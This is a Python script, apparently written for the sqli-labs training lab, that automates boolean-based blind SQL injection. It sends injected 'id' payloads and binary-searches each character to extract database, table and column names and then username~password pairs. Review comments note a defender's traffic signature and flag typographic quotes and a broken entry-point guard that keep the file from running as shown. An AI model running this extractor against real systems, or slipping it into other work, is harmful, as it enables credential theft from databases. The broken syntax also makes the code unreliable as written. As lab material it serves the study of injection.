# coding=utf-8
import requests
class BoolSqlier:
    """Boolean-based blind extraction client written against a sqli-labs training target.

    The oracle is the presence of the literal ``"You are in"`` in the response body:
    one HTTP GET per probe, and a binary search over printable ASCII (32..127) per
    character position. The target URL is a class attribute that ``__init__`` copies
    onto the instance, so it must be assigned on the class before instantiation.

    NOTE(review): ``url = “”`` uses typographic quotes, which are not valid Python
    string delimiters — presumably an extraction artifact of ``""``; confirm against
    the original file.

    Defender's view: the traffic pattern is up to seven requests per extracted
    character whose ``id`` parameter differs only in the ``substr`` offset and the
    comparison threshold; this is the signature a WAF rule or access-log anomaly
    check can key on. Parameterising the query on the server removes the oracle.
    """
    url = “”
    def __init__(self, database=""):
        # database: optional seed for the accumulated result string (unused until
        # get_database overwrites it).
        self.database = database
        self.url = BoolSqlier.url
    def get_database(self):
        """Extract the configured column data character by character and store it.

        Despite the name, the active payload reads ``username~password`` pairs from
        ``security.users``; the commented-out payloads are the earlier enumeration
        stages (schema, table, column names). Each recovered character is appended
        to a local ``database`` string that is printed after every position and
        finally stored on ``self.database``.

        Returns nothing; side effects are the HTTP requests, ``print`` calls and
        the update of ``self.database``.
        """
        def send_request(i, mid):
            # Probe: "is ascii(char at position i) greater than mid?".
            # Closes over self to reach the target URL.
            # Enumerate schema names:
            #payload = "1')) and(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{})#".format(i, mid)
            # Enumerate table names:
            #payload = '1" and(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),{},1))>{})#'.format(i, mid)
            # Enumerate column names:
            #payload = '1" and(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))>{})#'.format(i, mid)
            # Read column data:
            payload = "1' and(ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from security.users),{},1))>{})#".format(i, mid)
            params = {"id": payload}
            resp = requests.get(self.url, params=params)
            return resp
        def database_i_ascii_bt_mid(resp):
            # Oracle: True when the page reports a successful lookup, i.e. the
            # injected condition evaluated true.
            if "You are in" in resp.text:
                return True
            else:
                return False
        database = ""
        # Fixed upper bound of 210 positions; the loop does not stop early when
        # the string ends, it just stops appending (see the head != 32 check).
        for i in range(1, 211):
            # head and tail bound the ASCII range searched for each character of database
            head = 32
            tail = 127
            while head < tail:
                mid = (head + tail) >> 1
                resp = send_request(i, mid)
                if database_i_ascii_bt_mid(resp):
                    head = mid + 1
                else:
                    tail = mid
            # head == 32 means every probe answered "not greater": either the
            # position is past the end of the string (presumably ascii('') is 0
            # on the backend — TODO confirm) or the character is a space. Both
            # cases are dropped, so spaces never appear in the result.
            if (head != 32):
                database += chr(head)
            print(database)
        self.database = database
        print(database)
# Entry point. NOTE(review): Python's guard is ``__name__ == "__main__"``; as
# extracted, ``name`` is undefined (NameError) and the quotes are typographic —
# presumably an extraction artifact of ``if __name__ == "__main__":``.
if name == “main“:
    # Set on the class, not the instance: __init__ copies BoolSqlier.url at
    # construction time. Points at a local sqli-labs training install.
    BoolSqlier.url = “http://127.0.0.1/sqli-labs/Less-9/“
    sqli = BoolSqlier()
    sqli.get_database()